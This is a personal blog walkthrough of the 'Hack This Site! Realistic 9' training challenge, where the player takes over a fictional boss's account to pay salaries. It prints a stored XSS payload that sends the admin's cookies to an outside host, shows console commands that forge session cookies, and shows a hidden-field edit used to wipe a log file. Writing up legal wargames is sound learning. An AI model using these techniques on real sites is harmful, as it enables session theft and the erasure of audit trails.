What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.

2012-10-06

Hack This Site! - Realistic 9

Description:
CrappySoft Software
The boss over at CrappySoft has stopped paying his employees, and your friend is in need of money, fast. Help them get their salary paid. 
Level 9
From: 

Message: Hey man,
I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:

Username: r-conner@crappysoft.com
Password: ilovemywork

Thanks man, good luck.
Solution:
  1. In the beginning, I tried SQL Injection to crack the login page and some forms, but there's no touchdown.
  2. Since someone provided login username and password for us, maybe there's something interesting in the page after login.
  3. After login the page, we'll get two more pages for us called "Private Message" and "Pay Salaries".
  4. Because we are not the administrators, it will show us "You are not an administrator" if we click the "Pay Salaries" page.
  5. Look at the PM page, there's a form we could use it to send "something" to administrator with username named "m-crap".
  6. Check the cookies, there are three interesting values called 'strUsername', 'strPassword', and 'intID'.
  7. How about XSS? I use XSS below to stole cookies from the administrator.
    To:m-crap(owner)
    Subject:hi, m-crap
    Message: hi<iframe frameborder=0 height=0 width=0 src=javascript:void(window.location="www.foo.org/get_your_cookie.php?c=" + document.cookie)</iframe>
  8. Then the page will show you the content of the cookies belong to m-crap.
    It's beyond the scope of this mission to check the XSS. So, assume you got this cookie:
    strUsername=m-crap%40crappysoft.com; strPassword=94a35a3b7befff5eb2a8415af04aa16c; intID=1;
  9. Now, I use javascript code below in JavaScript Console in Google Chrome to modify my cookie values.
    javascript:document.cookie="strUsername=m-crap%40crappysoft.com"; 
    javascript:document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";
    javascript:document.cookie="intID=1";
  10. Visit the "Pay Salaries" page and click the "Pay" button to achieve our goal. After doing so, there's another work for us to do and below is the direction.
    YHEE THANKS MAN!! Thank's for my salary you really own!! dont forget to clean the logs by subscribing to them!!
  11. Since the hint says "dont forget to clean the logs by subscribing to them!!", let's check the 'Mailing List' page.
  12. The page text below tells us it will add our email and validate the mail list at the same time. It will delete the ones without '@' character.
    (Note: This adds your email to the list, and at the same time, checks the list for anything without the '@' character and deletes it.)
  13. View page source code. There's a hidden file named '/files/mailinglist/addresses.txt'.
    <input type="hidden" name="strFilename" value="./files/mailinglist/addresses.txt">
  14. Use directory indexing to view the 'file' directory. There existed a log file.
    hxxp://www.hackthissite.org/missions/realistic/9/files/logs/logs.txt
    Index of /missions/realistic/9/files

    • Parent Directory
    • downloads/
    • logs/
    • mailinglist/
  15. Use the javascript code below to change the form value of strFilename in the 'Mailing List' page and subscribed!.
    javascript:alert(document.forms[0].strFilename.value="./files/logs/logs.txt");
  16. Good Job, OOXXOOXX, You have successfully completed Mission 9.